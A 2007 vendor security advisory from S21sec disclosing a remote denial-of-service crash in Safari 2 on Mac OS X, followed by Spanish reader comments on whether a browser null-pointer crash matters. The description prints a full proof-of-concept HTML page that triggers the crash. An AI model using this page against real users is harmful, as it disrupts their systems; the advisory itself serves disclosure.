Español | English
rss facebook linkedin Twitter

S21SEC-039-en: Safari 2 Denial of Service

##############################################################

- S21Sec Advisory -

##############################################################

Title: Safari 2 Denial of Service
ID: S21SEC-039-en
Severity: Medium - Remote DoS
History: 15.Jul.2007 Vulnerability discovered
22.Jul.2007 Vendor contacted
27.Jul.2007 Vendor confirmed the vulnerability
26.Oct.2007 Safari 3 in Leopard
14.Nov.2007 Safari 3 in Tiger

Scope: Remote Denial of Service
Platforms: OSX
Author: David Barroso (dbarroso@s21sec.com)
URL: http://www.s21sec.com/avisos/s21sec-039-en.txt
Release: Public


[ SUMMARY ]

According to Wikipedia, Safari is a web browser developed by Apple Inc. and included in Mac OS X.
It was first released as a public beta on January 7, 2003, as the default browser
in Mac OS X v10.3. A beta version for Microsoft Windows was released for the first time on
June 11, 2007 with support for Windows XP and Windows Vista


[ AFFECTED VERSIONS ]

Following versions are affected with this issue:

- Safari Version 2 (MacOSX Version)


[ DESCRIPTION ]

A crafted HTML page can make Safari crash when trying to parse the page due to an unproper validation in the KHTML Webkit.

Example:

<html>
<head>
<title>Safari Exploit</title>
</head>
<body>

<form>
<div id="foo" style="display:none;">
<table>
<tr>
<td></td>
</tr>
</table>
</div>
<input type="text" />
</form>
</body>
</html>

[ WORKAROUND ]

The vulnerability was patched in Safari 3, officially released on October, 2007 (Leopard) and November, 2007 (Tiger).


[ ACKNOWLEDGMENTS ]

This vulnerability have been found and researched by:

- David Barroso S21sec labs


[ REFERENCES ]

* Wikipedia. Safari
http://en.wikipedia.org/wiki/Safari_%28web_browser%29

* Safari
http://www.apple.com/safari/

* S21Sec
http://www.s21sec.com

* Blog S21sec
http://blog.s21sec.com

4 comentarios:

Anónimo dijo...

Sin ánimos de ofender, pero... ¿Qué importancia tiene un DOS en un navegador? Si me dices que es en un motor antivirus, en el procesamiento de correos electrónicos o algo similiar puedo entenderlo pero, ¿En un navegador?

S21sec labs dijo...

Tienes razón en que al principio no parece que cause sino una ligera molestia a la persona que está navegando, pero el hecho de tener una vulnerabilidad que nosotros no hemos visto que se pueda explotar (es un puntero a null) no implica que gracias a otra vulnerabilidad relacionada u otra persona que encuentre una forma de explotarla, pueda ser utilizada para la ejecución remota (algunas vulnerabilidades que se publicaron como DoS realmente luego existe alguna forma de ejecutar código).

De hecho, la vulnerabilidad no tiene parche, ya que Apple considera que Safari 2 es un producto "deprecated" y ahora se centra sólo en Safari 3.

Zhodiac dijo...

Sin animo de ofender tampoco, un NULL dereference en una aplicación cliente donde hasta la fecha se desconoce (y dudo que se pueda) hacer COMMIT y RESERVE de la llamada 0page... no es lo que en el mundo de la seguridad se llama patch-class. P.e. si encuentras algo así en MS IE, no habrá ni bulletin, ni advisory, ni nada. Es otro fallo más que no se considerara explotable (ejecución de código).

Un DoS en una aplicación cliente no es considerado un fallo de seguridad actualmente.

Si se publicasen todos los NULL dereference que se encuentran en navegadores, las listas de seguridad estarian colapsadas :)

Pero igual me equivoco y teneis algún método para jugar con la 0page y ejecutar código... lo que haria un post realmente interesante :P

Fermín || Zhodiac

S21sec labs dijo...

Fermín,
está claro que un DoS en un navegador no es nada del otro mundo y que tiene poca utilidad práctica, pero lo hemos sacado por varios motivos:

* De Safari existen pocas vulnerabilidades
* Apple no sacará parche por lo que todos los que no usen al menos Tiger (que existen) siempre estarán expuestos
* Los conocidos MoAB o MoBB tienen también varias parecidas (incluso con CVE asignado), por lo que no viene mal tener más

Pero estoy de acuerdo contigo, no es que sea un problema crítico, pero al fin y al cabo, es una vulnerabilidad.


(+34 902 222 521)


24 horas / 7 días a la semana



© Copyright S21sec 2013 - Todos los derechos reservados


login